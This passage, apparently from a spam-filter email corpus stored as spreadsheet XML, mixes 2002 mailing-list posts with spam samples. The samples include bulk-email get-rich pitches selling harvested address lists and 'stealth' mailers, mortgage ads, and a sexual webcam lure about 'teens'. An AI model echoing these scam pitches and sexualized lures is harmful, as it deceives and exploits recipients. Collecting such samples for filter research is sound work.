 making $5,000 - $20,000 per week working from your 
 home.  Kiss your day job goodbye - this sure beats 
 the 9-5 daily grind!
 All you need is ambition and commitment.  This
 is no "get rich quick scheme".  You have to work
 to make big bucks, but ANYONE - and I mean ANYONE - can do 
 it.
 You're probably wondering if it's hard to get started.  
 Don't worry, it's not! I will show you step-by-step 
 how to start your first email campaign and how to
 build a booming online business.  You'll be generating 
 orders - AND MAKING MONEY - in less than seven days.
 Okay, so what if you don't have anything to sell?
 No problem!!  I'll show you where to find hot
 products that sell like CRAAAAAAZY! Most people delay
 starting an Internet business because they have 
 nothing to sell, but I'm removing that hurdle right now.  
 After reading the Bulkbook, you can build your complete 
 product line in less than two hours!  There is NO EXCUSE 
 not to get started! I will get you up-and-running within 
 seven days. In fact ...
 I personally guarantee that you will start your own 
 bulk email campaign less than a week after reading 
 the Bulkbook!  I'll give you a toll-free phone number 
 to reach me 24 hours a day, seven days a week; 
 where else will you find that level of service?!
 I will also include a step-by-step guide to starting 
 your very first email campaign called "Seven Days to 
 Bulk Email Success".  This seperate guide contains a daily 
 routine for you to follow with specific, exact 
 instructions on how to get started.  On day one, for 
 example, I teach you where to find a product to sell. 
 The next day you learn how to build a fresh mailing 
 list.  On the seventh day, you just click send!  Your 
 very first campaign is ready to go.
 As a special bonus, you'll recieve a FREE copy 
 of our STEALTH MASS MAILER, a very powerful bulk 
 email program which retails for $49.99! I'll even
 include 7 million email addresses absolutely FREE
 if you order NOW!
 Stop wasting your money on auction listing fees, 
 classifieds, and banner ads - they don't work, and 
 never will!  If you are SERIOUS about making money 
 on the Internet, bulk email is your only option.  
 What are you waiting for?  Few of us are willing 
 to share this knowledge, but I promise to teach 
 you everything I know about bulk emailing in this 
 extraordinary bulk emailer's handbook ... The Bulkbook! 
 Once again, here's the deal.  You give me $29.99.  
 I give you ALL THE TOOLS YOU NEED to become a
 successful, high profit bulk emailer.  INCLUDING:
 ** THE BULKBOOK
 Teaches you step-by-step how to become a high profit
 bulk emailer.  Secret techniques and tips never
 before revealed.
 ** SEVEN DAYS TO BULK EMAIL SUCCESS
 Provides detailed day-by-day instruction to start sending
 your first email campaign in seven days.
 ** 600 Email subjects that PULL LIKE CRAZY
 ** EMAIL LIST MANAGER
 Manage your email lists quickly and easily.  Very 
 user-friendly, yet powerful, software.
 ** STEALTH MASS MAILER
 Software can send up to 50,000 emails an hour automatically.
 Just load them in there and click SEND!
 ** ADDRESS ROVER 98 and MACROBOT SEARCH ENGINE ROBOT
 Extracts email addresses from databases and search engines
 at speeds of over 200,000 per hour.
 ** WORLDCAST EMAIL VERIFIER
 Used to verify your email addresses that you extract to 
 make sure they're valid.
 ** EBOOK PUBLISHER
 Easily publish your own e-books and reports for resale using,
 you guessed it, bulk email!
 ** SEVEN MILLION EMAIL ADDRESSES
 This huge list will get you started bulking right away.
 I harvested these addresses myself, the list is filled
 with IMPULSE BUYERS ready to respond to your ads!
 If you added up all of the FULL VERSION BULK EMAIL software
 included with the BULKBOOK package, it would total over
 $499.  I am giving you the whole bundle for only $29.99.
 That means there is no other out-of-pocket startup expense
 for you.  Nothing else to buy, no reason to waste money on
 software that doesn't work.  With this one package, you get 
 EVERYTHING YOU NEED to START BULK EMAILING RIGHT AWAY.  
 Are you willing to invest $29.99 for the opportunity
 to make a SIX FIGURE INCOME on the Internet with no 
 startup cash and very little effort?
 Remember, you will recieve a toll-free phone number
 for 24 hour expert advice and consultation FROM ME
 PERSONALLY.
 To order the Bulkbook right now for only $29.99 with 
 a Visa or Mastercard, please click on the link below. 
 This will take you to our secure server for order 
 processing:
 http://cbphost.net/users/quiksilver/bulkbook.htm
 Note: The Bulkbook will be delivered electronically
 within 24 hours. It is not available in printed form. 
 ***********************************************************
 Our company is strictly opposed to unsolicited email.
 To be removed from this opt-in list, please send a 
 request to "quiksilver@cbulkhost.com"
 ***********************************************************
 7870fubX0-764wHdL6646musT3-086uml30
</t>
  </si>
  <si>
    <t xml:space="preserve">funny. i read it as green = red, as in accounting, as in fiscally
 irresponsible.  which do you think is the worse indictment - overregulation
 or overspending?  there are many (dickheads) who buy into the
 neo-conservative media's (fox's) definiton of "liberal" as "one who seeks to
 impose both."
 hannity and glove.
 best quote, wish i could remember who said it: "we tend to describe our own
 party by its ideals and our opponents' party by its reality."
 geege
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Bill
 Humphries
 Sent: Monday, September 23, 2002 10:00 PM
 To: fork@example.com
 Subject: Re: Goodbye Global Warming
 On Monday, September 23, 2002, at 03:25 PM, R. A. Hettinga wrote:
 &gt;          Green = Red.
 		Capitalist = Nazi.
 		Information content of the above statements === 0.
 Meanwhile, the angels of light (tm) are having a great knock-down
 drag-out with the eldrich kings of .NET on XML-DEV.
 -- whump
 ----
 Bill Humphries &lt;bill@whump.com&gt;
 http://www.whump.com/moreLikeThis/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: I just put my webcam on 4u hunnie=)
</t>
  </si>
  <si>
    <t xml:space="preserve">Wanna see sexually curious teens playing with each other on webcam?
 http://www.yourtastybaby.net  &lt;----- our webcam link=)
 me and my dorm mate are eating each other out as we speak!
 see you soon baby,
 -Tiffany
 kludlkaiplcqcnnaigaybaxhesrhltsp
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, ""Angles" wrote :
 &gt; When I went all "Open Source", I stopped using my old partioning app
 &gt; (partition magic?). For the RH7 install I used FIPS (a couple times).
 &gt; Then ext3 came out and my old commercial partioning app is real old, so I
 &gt; ask what OS software can non-destructively repartition a HD so I can put
 &gt; /home on a seperate partition now?
 Parted is your friend! You can't do _everything_, the most limiting being
 that you can't move the start of a partition, but it's quite powerful
 nevertheless, and I've been very happy with it the few times I've had to
 use it.
 &gt; &gt;If you didn't put /home on a separate partition,
 &gt; 
 &gt; With winbloze 9x I used to deltree the winbloze dir and some "Program
 &gt; Files" dirs, and install "fresh" instead of upgrade, while saving my
 &gt; other data. Can this trick be used with this RH8 upgrade? Example rpm -e
 &gt; everything so all packages are gone, hit "reset" button and boot to
 &gt; redhat CDROM in admin (rescue?) mode, delete all those config files left,
 &gt; like "/etc/*", then do an install BUT NOT FORMAT THAT SINGLE PARTITION
 &gt; that I'm installing on. If I can hack the details, is this theory
 &gt; accurate, or will RH want to destructively install and elimate all
 &gt; existing files?
 You're really better off backuping all placed where you know you've hand
 edited or installed some files. For me that's only /etc/, /root/ and
 /home/. Then you reinstall cleanly, formating "/", put your /home/ files
 back into place and you're ready to go.
 That's the moment I usually realize I had a nifty tweak to a file in
 /etc/sysconfig/network-scripts/ or some special parameters added to an
 /etc/modules.conf entry... so I look at my backup and make the same change
 again. The only thing where you can get stuck is the grub.conf files,
 because although there's a /etc/grub.conf link, it's actually in
 /boot/grub/ so you may want to copy it too if you have special kernel
 parameters to save (I have to pass "pci=bios,biosirq" for one of my
 computers to work for example).
 HTH,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</si>
  <si>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New Gunner Gilberto is quick to earn his stripes
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-6,8572784,215/
 Date: 2002-10-05T03:05:35+01:00
 *Football:* Arsenal midfielder believes the Premiership champions have the 
 ablility to become the world's best.
</t>
  </si>
  <si>
    <t xml:space="preserve">Adam L. Beberg wrote:
 &gt; On Tue, 3 Sep 2002, Kragen Sitaker wrote:
 &gt; [entire post included]
 Yep, he sure did. But thanks for reminding us.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Take your Marketing to the Next Level
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Digital Publishing Tools - Free Software Alert!&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#FFFFFF" text="#000000"&gt;
 &lt;center&gt;
 &lt;table width="582" border="2" cellspacing="0" cellpadding="5" bordercolor="#0077CC"&gt;
 &lt;tr&gt;
 &lt;td colspan="3" width="582" align="center" bgcolor="#0077CC"&gt;&lt;!5122qHWL1-032pyeM4045IIgM3-001oYhw0942jQSK5-726UDqG9283lEHR8-145EiGhl64&gt;
 &lt;a href="http://3dpageturningebook.com" style="text-decoration:none;"&gt;
 &lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="4" color="#FFFFFF"&gt;Publish Like a Professional with Digital Publishing Tools&lt;/font&gt;&lt;/b&gt;
 &lt;/a&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="1" width="204" valign="top"&gt;
 &lt;b&gt;&lt;font face="Verdana Arial, Helvetica, sans-serif" color="#000066" size="2"&gt;Easily Create Professional:&lt;/font&gt;&lt;/b&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1" color="#000066"&gt;
 &lt;ul&gt;
 &lt;li&gt;eBooks&lt;/li&gt;
 &lt;li&gt;eBrochures&lt;/li&gt;
 &lt;li&gt;eCatalogs&lt;/li&gt;
 &lt;li&gt;Resumes&lt;/li&gt;
 &lt;li&gt;Newsletters&lt;/li&gt;
 &lt;li&gt;Presentations&lt;/li&gt;
 &lt;li&gt;Magazines&lt;/li&gt;
 &lt;li&gt;Photo Albums&lt;/li&gt;
 &lt;li&gt;Invitations&lt;/li&gt;
 &lt;li&gt;Much, much more&lt;/li&gt;
 &lt;/ul&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;td colspan="1" width="264" valign="top" align="center"&gt;
 &lt;b&gt;&lt;font face="Verdana Arial, Helvetica, sans-serif" color="#000066" size="2"&gt;Save MONEY! - Save Trees&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1" color="#0077CC"&gt;
 Save on Printing, Postage and Advertising Costs&lt;/font&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://3dpageturningebook.com" style="text-decoration:none;"&gt;
 &lt;b&gt;&lt;font face="Verdana Arial, Helvetica, sans-serif" color="#000099" size="5"&gt;DIGITAL PUBLISHING TOOLS&lt;/font&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;font face="Verdana Arial, Helvetica, sans-serif" color="#000066" size="3"&gt;DOWNLOAD NEW FREE Version NOW!&lt;/font&gt;&lt;/b&gt;
 &lt;/a&gt;
 &lt;br&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1" color="#0077CC"&gt;*Limited Time Offer&lt;/font&gt;
 &lt;/td&gt;
 &lt;td width="204" valign="top"&gt;&lt;b&gt;
 &lt;font face="Verdana Arial, Helvetica, sans-serif" size="2" color="#000066"&gt;Choose from these&lt;br&gt;
 Display Styles:&lt;/font&gt;&lt;/b&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1" color="#000066"&gt;
 &lt;ul&gt;
 &lt;li&gt;3D Page Turn&lt;/li&gt;
 &lt;li&gt;Slide Show&lt;/li&gt;
 &lt;li&gt;Sweep/Wipe&lt;/li&gt;
 &lt;/ul&gt;
 &lt;/font&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1" color="#0077CC"&gt;Embed hyperlinks and Link to anywhere Online, 
 such as your Website, Order Page or Contact Form.
 &lt;br&gt;
 &lt;br&gt;
 Distribute via Floppy, CD-ROM, E-Mail or Online.
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan="3" width="582" align="center" bgcolor="#0077CC"&gt; 
 &lt;font color="#FFFFFF" face="Verdana, Arial, Helvetica, sans-serif" size="4"&gt;&lt;b&gt;
 Take your Marketing to the Next Level!&lt;/b&gt;&lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="2" width="384"&gt; 
 &lt;font size="2" face="Verdana Arial, Helvetica, sans-serif" color="#000066"&gt;
 For &lt;b&gt;More Info&lt;/b&gt;, &lt;b&gt;Samples&lt;/b&gt; or a &lt;b&gt;FREE Download&lt;/b&gt;, click the appropriate link to the right! &amp;nbsp;
 Server demand is extremely high for this limited time &lt;b&gt;Free Software&lt;/b&gt; offer. &amp;nbsp;
 &lt;b&gt;Please try these links periodically if a site seems slow or unreachable.&lt;/b&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;td colspan="1" width="204" align="center"&gt; 
 &lt;b&gt;&lt;font size="4" face="Verdana, Arial, Helvetica, sans-serif"&gt;
 &lt;a href="http://3dpageturningebook.com"&gt;WEBSITE 1&lt;/a&gt;&lt;br&gt;
 &lt;a href="http://TheyGo.com/FreeSoftware"&gt;WEBSITE 2&lt;/a&gt;&lt;br&gt;
 &lt;a href="http://www.digitalpublishingtools.com"&gt;WEBSITE 3&lt;/a&gt;&lt;br&gt;
 &lt;/font&gt;&lt;/b&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="3" width="582" align="center"&gt;
 &lt;form action="http://www.3dpageturningebook.com/unsubscribe.asp" method="post"&gt;
 &lt;font size="2" face="Verdana Arial, Helvetica, sans-serif" color="#000066"&gt;
 If you wish to be removed from our mailing list, please cick the Unsubscribe button
 &lt;/font&gt;
 &lt;br&gt;
 &lt;input size="25" name="e" value="zzzz@spamassassin.taint.org
 "&gt; &amp;nbsp;&lt;input type="submit" value="Unsubscribe"&gt;
 &lt;input type="hidden" name="c" value="unsub"&gt;
 &lt;/form&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" color=#000066 size=1&gt;Copyright  2002 - Affiliate ID #1269&lt;br&gt;
 *FREE Version is FULLY FUNCTIONAL with NO EXPIRATION and has a 4 page (2 page spread) limit.&lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Polit-spam
</t>
  </si>
  <si>
    <t xml:space="preserve">
 This is something new, or at least new to me: 
     Politspam (n): Using a spam engine for political purposes.
 In this particular case, to get back at the University of Groningen.
 The content suggests its more prank than vigilante activism (in the
 old days we used to say "someone left their terminal unguarded")
 but what's interesting is that it's not trying to sell me anything
 or lead me to any for-fee service, it's just trying to spread
 a meme that RUG is evil.
 &gt;&gt;&gt;&gt;&gt; "w" == wpin  &lt;lslifriend&gt; writes:
     w&gt; Those who want to leave for the Netherlands to carry on any
     w&gt; kind of education,including for PHD, must be careful
     w&gt; . Especially the university of Groningen(RUG) should be
     w&gt; avoided. This university was once a good one but now it has
     w&gt; lost its reputation. ... Studying is a good investment in time
     w&gt; and money. So invest in the right place and time. You are
     w&gt; warned.
     w&gt; Sincerely yours,
     w&gt; hyohxsycjlakdbmhjpiouupngoqrm
 Has anyone else started to receive either consumer vigilante or
 political activism messages via spam methods?
 -- 
 Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
  - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
   "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Fw: The money saving plan we spoke of              LQDDDQ
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;META http-equiv=3DContent-Type content=3Dtext/html;charset=3Di=
 so-8859-1&gt;&lt;STYLE type=3Dtext/css&gt;H1 { } TD {  FONT-SIZE: 12px; FONT-FAMILY=
 : Arial, Helvetica, sans-serif } P {  FONT-SIZE: 12px; FONT-FAMILY: Arial,=
  Helvetica, sans-serif }&lt;/STYLE&gt;&lt;META content=3D"MSHTML 6.00.2600.0" name=3D=
 GENERATOR&gt;&lt;/HEAD&gt;&lt;BODY bgColor=3D#ffffff&gt;&lt;TABLE cellSpacing=3D0 cellPaddin=
 g=3D0 width=3D630 border=3D0&gt; &lt;TBODY&gt;&lt;TR&gt;&lt;TD bgColor=3D#000099 colSpan=3D3=
 &gt;&lt;/TD&gt;&lt;TR&gt;&lt;TD width=3D20 bgColor=3D#ffcc00 rowSpan=3D4&gt;&amp;nbsp;&lt;/TD&gt;&lt;TD noWr=
 ap bgColor=3D#000080 height=3D34&gt;&lt;DIV style=3D"FONT-SIZE: 24px; COLOR: #ff=
 b401; FONT-FAMILY: Arial Narrow; TEXT-ALIGN: center"&gt;Compare Now Online + =
 Save!&lt;/FONT&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;TD noWrap align=3Dtop bgColor=3D#000080 height=3D3=
 4&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD vAlign=3Dtop align=3Dleft&gt; &lt;BLOCKQUOTE&gt;&lt;B&gt;&lt;BR&gt;&lt;FONT co=
 lor=3Dnavy size=3D4&gt;Dear Homeowner,&lt;/B&gt;&lt;BR&gt;&lt;BR&gt;&lt;FONT face=3Darial color=3D=
 red size=3D3&gt;&lt;B&gt;&lt;I&gt;"Now is the time to take advantage of falling interest =
 rates!&amp;nbsp;There is no advantage in waiting any longer."&lt;/I&gt;&lt;/B&gt;&lt;BR&gt;&lt;BR&gt;&lt;=
 /FONT&gt;&lt;FONT size=3D3&gt;Refinance or consolidate high interest credit card de=
 bt into a low interest mortgage.&amp;nbsp; Mortgage interest is tax deductible=
 , whereas credit card interest is not.&lt;BR&gt;&lt;BR&gt;You can save thousands of do=
 llars over the course of your loan with just a 0.25% drop in your rate!&lt;BR=
 &gt;&lt;BR&gt;Our nationwide network of lenders have hundreds of different loan pro=
 grams to fit your current situation: &lt;BLOCKQUOTE&gt;&lt;FONT color=3Dred&gt;&lt;B&gt;&lt;UL&gt;=
 &lt;LI&gt;Refinance&lt;LI&gt;Second Mortgage&lt;LI&gt;Debt Consolidation&lt;LI&gt;Home Improvement=
 &lt;LI&gt;Purchase&amp;nbsp;&lt;/LI&gt;&lt;/UL&gt;&lt;/B&gt;&lt;/BLOCKQUOTE&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;P align=3Dcenter&gt;=
 &lt;FONT size=3D4&gt;&lt;A href=3Dhttp://209.163.187.54/&gt;"Let us do the shopping fo=
 r you...IT IS FREE!&lt;BR&gt;CLICK HERE"&lt;/A&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;BR&gt;&lt;br&gt;&lt;br&gt;&lt;B&gt;Please&lt;A h=
 ref=3Dhttp://209.163.187.54/&gt;&lt;B&gt; CLICK HERE&lt;/B&gt;&lt;/A&gt; to fill out a quick fo=
 rm. Your request will be transmitted to our network of mortgage specialist=
 s who will respond with up to three independent offers.&lt;/B&gt;&lt;BR&gt;&lt;BR&gt;&lt;B&gt;This=
  service is 100% free to home owners and new home buyers without any oblig=
 ation.&lt;/B&gt;&lt;P align=3Dcenter&gt;&lt;A href=3Dhttp://209.163.187.54&gt;&lt;IMG src=3Dhtt=
 p://209.163.187.54/images/eho.gif border=3D0&gt;&lt;/A&gt;&lt;/P&gt;&lt;/BLOCKQUOTE&gt;&lt;/FONT&gt;&lt;=
 /FONT&gt;&lt;/TD&gt;&lt;TD vAlign=3Dtop align=3Dright width=3D180&gt;&lt;BR&gt;&lt;BR&gt;&lt;P align=3Dc=
 enter&gt;&lt;FONT color=3Dblue size=3D1&gt;Data Flow&lt;/FONT&gt;&lt;A href=3Dhttp://209.163=
 187.54/&gt;&lt;IMG src=3Dhttp://209.163.187.54/images/DataFlow.gif border=3D0&gt;&lt;=
 /A&gt;&lt;BR&gt;&lt;BR&gt;&lt;BASEFONT size=3D2&gt;&lt;TABLE width=3D175 bgColor=3D#eeeeee&gt; &lt;TBODY=
 &gt;&lt;TR&gt;&lt;TD align=3Dmiddle colSpan=3D2&gt;National Averages&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD wid=
 th=3D91&gt;&lt;U&gt;Program&lt;/U&gt;&lt;/TD&gt;&lt;TD&gt;&lt;U&gt;Rate&lt;/U&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD width=3D91&gt;30Y=
 ear Fixed&lt;/TD&gt;&lt;TD width=3D42&gt;6.375%&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD width=3D91&gt;15Year Fix=
 ed&lt;/TD&gt;&lt;TD width=3D42&gt;5.750%&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD width=3D91&gt;5Year Balloon&lt;/TD=
 &gt;&lt;TD width=3D42&gt;5.250%&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD width=3D91&gt;1/1Arm&lt;/TD&gt;&lt;TD width=3D=
 42&gt;4.250%&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD width=3D91&gt;5/1Arm&lt;/TD&gt;&lt;TD width=3D42&gt;5.625%&lt;/TD=
 &gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD width=3D91&gt;&lt;FONT size=3D-2&gt;FHA30 Year Fixed&lt;/FONT&gt;&lt;/TD&gt;&lt;TD w=
 idth=3D42&gt;6.500%&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD width=3D91&gt;VA 30 Year Fixed&lt;/TD&gt;&lt;TD widt=
 h=3D42&gt;6.500%&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;BR&gt;&lt;FONT size=3D2&gt;&lt;P align=3Dright=
 &gt;"&lt;I&gt;You did all the shopping for me. Thank you!&lt;/I&gt;&lt;BR&gt;&lt;B&gt;-&lt;FONT size=3D1=
 &gt;T N. Cap.Beach, CA&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;P align=3Dright&gt;"&lt;I&gt;...You helped me=
  finance a new home and I got a very good deal.&lt;/I&gt;&lt;BR&gt;&lt;B&gt;-&lt;FONT size=3D1&gt;=
  R H. H.Beach, CA&lt;/FONT&gt;&lt;/B&gt;&lt;BR&gt;&lt;P align=3Dright&gt;"&lt;I&gt;..it was easy, and qu=
 ick...!&lt;/I&gt;&lt;BR&gt;&lt;B&gt;-&lt;FONT size=3D1&gt;V S. N.P.Beach, WA&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;/F=
 ONT&gt;&lt;/P&gt;&lt;/BASEFONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;=
 br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt; &lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
 So much for carnivore ;)
 -- 
 Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
  - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
   "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Doesn't smell like team spirit
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8688976,215/
 Date: 2002-10-09T03:15:14+01:00
 *Football:* It's a safe bet that Kurt Cobain hated sports. And when you look at 
 the England football team, it's difficult not to agree with him, writes *Steven 
 Wells*.
</t>
  </si>
  <si>
    <t xml:space="preserve">
     &gt;&gt; ... choose something with a different prefix than "X-Spam-" so that
     &gt;&gt; people don't confuse it with SpamAssassin ...
     Neale&gt; How about X-Spambayes-Disposition (or X-Hammie-Disposition if
     Neale&gt; there'll be other classifier front-ends)?
 I kinda like "hammie".  Your front end was there first, so I suspect it will
 rule the front end roost.
 S
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Get Hundreds Of Fresh Leads via email !!!
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Dear Consumers, Increase your Business Sales! How?? By 
 targeting millions of buyers via e-mail !! 
 15 MILLION EMAILS + Bulk Mailing Software For Only $100.00
 super low price! ACT NOW !!!
 Our Fresh Addresses Will Bring You 
 Incredible Results!
 If you REALLY want to get the word out regarding
 your services or products, Bulk Email is the BEST 
 way to do so, PERIOD! Advertising in newsgroups is 
 good but you're competing with hundreds even THOUSANDS
 of other ads. Will your customer's see YOUR ad in the 
 midst of all the others?
 Free Classifieds? (Don't work)
 Web Site? (Takes thousands of visitors)
 Banners? (Expensive and iffy)
 E-Zine? (They better have a huge list)
 Search Engines? (Easily buried with thousands of others)
 Bulk Email will allow you to DIRECTLY contact your
 potential customers. They are much more likely to
 take the time to read about what you have to offer 
 if it was as easy as reading it via email rather
 than searching through countless postings in 
 newsgroups.
 The list's are divided into groups and are compressed. 
 This will allow you to use the names right off the cd. 
 ORDER IN THE NEXT 72 hours AND RECEIVE 4 BONUSES!! 
 *BONUS #1 Receive an additional cd-rom with millions of fresh, 
 deliverable general internet e-mail addresses free!! 
 *BONUS #2 Receive 2000 how to books, reports and manuals on cd-rom with
 reprint resale rights! Produce for pennies and resell for BIG dollars! 
 *BONUS #3 Receive the Mass Mailer bulk delivery software, with full
 operating instructions. This software will get the mail out QUICK! 
 *BONUS #4 Receive the Informational Guide to bulk e-mail. This guide 
 will give you all the information you need to get started! 
 THIS IS A ONE TIME PACKAGE DEAL WORTH HUNDREDS OF DOLLARS!! 
 ACT NOW! THIS IS A LIMITED TIME OFFER! ORDER WHILE SUPPLIES LAST! 
 RECEIVE THIS DREAM PACKAGE FOR THE UNBELIEVABLE LOW, LOW PRICE OF 
 ONLY $100.00
 ORDERING INFORMATION:
 Send check are money order to:
 SELLERS COMMUNICATIONS
 2714 WEST 5th
 North Platte, Ne 69101
 U.S.A.
 CHECK BY FAX SERVICES OR CREDIT CARO INFO: 
 O R D E R N O W . . . SAME DAY SERVICE (M-F) if your order
 is received before 3pm Central . To place an order, you can call us at: 
 1-308-534-2098 Are fax your order to 1-208-975-0773 are 1-208-975-0774
 This Number is for credit Card Orders Only!!!
 CHECK BY FAX SERVICES!
 __________________________________________
 To order, via credit card simply cut/paste and print out the
 EZ ORDER FORM below and fax to our office today.
 ***** NOW ONLY $100! *****
 This "Special Price" is in effect for the next seven days,
 after that we go back to our regular price of $250.00 ...
 Don't delay... you can be in business tomorrow! 
 We accept Visa, Mastercard, Amex, Disc and Checks by Fax.
 ----------------------Cut &amp; Paste----------------------
 ---------------------EZ Order Form---------------------
 _____Yes! I want everything! I am ordering within 72 hours.
 Include my FREE "Business On A Disk" bonus along with your 
 Millions of E-Mail addresses on CD (plus 1,093,808 bonus addresses)
 for the special price of only $100.00 + shipping as indicated
 below.
 _____Yes! I missed the 72 hour special, but I am ordering
 CD WITH, super clean e-mail addresses within 7 days for the
 "special" price of only $250.00 + s&amp;h.
 _____Oop's I missed the 72 hour and 7 day "specials". I am
 ordering The Cd at the regular price of $250.00 + s&amp;h.
 ***PLEASE SELECT YOUR SHIPPING OPTION***
 ____I would like to receive my package FedEx OVERNIGHT. I am
 including $15 for shipping. (Hawaii &amp; Alaska $20 - Canada $25,
 all other International add an *additional* $25 [$40 total] for shipping)
 ____I would like to receive my package FedEx 2 DAY delivery.
 I'm including $10 for shipping. (Sorry no Canada or International
 delivery - Continental U.S. shipping addresses only)
 ***Please Print Carefully***
 NOTE: Orders cannot be shipped without complete information
 including your signature. No exceptions!
 NAME____________________________________________________
 COMPANY NAME____________________________________________
 ADDRESS_________________________________________________
 (FedEx can only ship to street addresses - no P.O. boxes)
 CITY, STATE, ZIP________________________________________
 PHONE NUMBER____________________________________________
 (required for shipping &amp; tracking) 
 EMAIL ADDRESS___________________________________________
 (Print Carefully - required in case we have a question and to
 send you a confirmation that your order has been shipped and for 
 technical support if you order within 24 hrs) 
 TYPE OF CREDIT CARD:
 ______VISA _____MASTERCARD ______AMEX ______DISC
 CREDIT CARD# __________________________________________
 EXPIRATION DATE________________________________________
 NAME ON CARD___________________________________________
 TOTAL AMOUNT (Including Shipping): $___________________
 DATE:x__________________
 (Required) SIGNATURE:x_________________________________
 I understand that I am purchasing the e-mail address on CD,
 and authorize the above charge to my credit card, the addresses are not rented, 
 but are mine to use for my own mailing, over-and-over. Free bonuses are included, 
 but cannot be considered part of the financial transaction. I understand that it 
 is my responsibility to comply with any laws applicable to my local area. As with 
 all software, once opened the CD may not be returned, however, if found defective 
 it will be replaced with like product at no charge.
 O R D E R N O W . . . SAME DAY SERVICE (M-F) if your order
 is received before 3pm Central . To place an order, you can call us at: 
 1-308-534-2098 Are fax your order to 1-208-975-0773 are 208-975-0774
 This Number is for credit Card Orders Only!!!
 CHECK BY FAX SERVICES!
 If you would like to fax a check, paste your check below and fax it to our office 
 along with the EZ Order Form forms to: 1-208-975-0773 are 208-975-0774
 **********************************************************
 ***24 HOUR FAX SERVICES*** PLEASE PASTE YOUR
 CHECK HERE AND FAX IT TO US AT 1-208-975-0774
 are 208-975-0773
 **********************************************************
 If You fax a check, there is no need for you to mail the
 original. We will draft a new check, with the exact
 information from your original check. All checks will be
 held for bank clearance. (7-10 days) Make payable to: 
 "SELLERS COMMUNICATIONS"
 -=-=-=-=--=-=-=-=-=-=-=Remove Instructions=-=-=-=-=-=-=-=-=-=-=-=
 **************************************************************
 Do not reply to this message - 
 To be removed from future mailings:
 mailto:nonono122002@yahoo.com?Subject=Remove
 **************************************************************
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Re: Bomb Ikea
</t>
  </si>
  <si>
    <t xml:space="preserve">Tim Chapman writes:
 &gt; http://news.bbc.co.uk/1/hi/world/europe/2541827.stm 
 &gt; 
 &gt; Wednesday, 4 December, 2002, 08:52 GMT
 &gt; Bomber targets Dutch Ikea stores 
 &gt; 
 &gt; Police in the Netherlands are searching all 10 outlets of the Ikea furniture
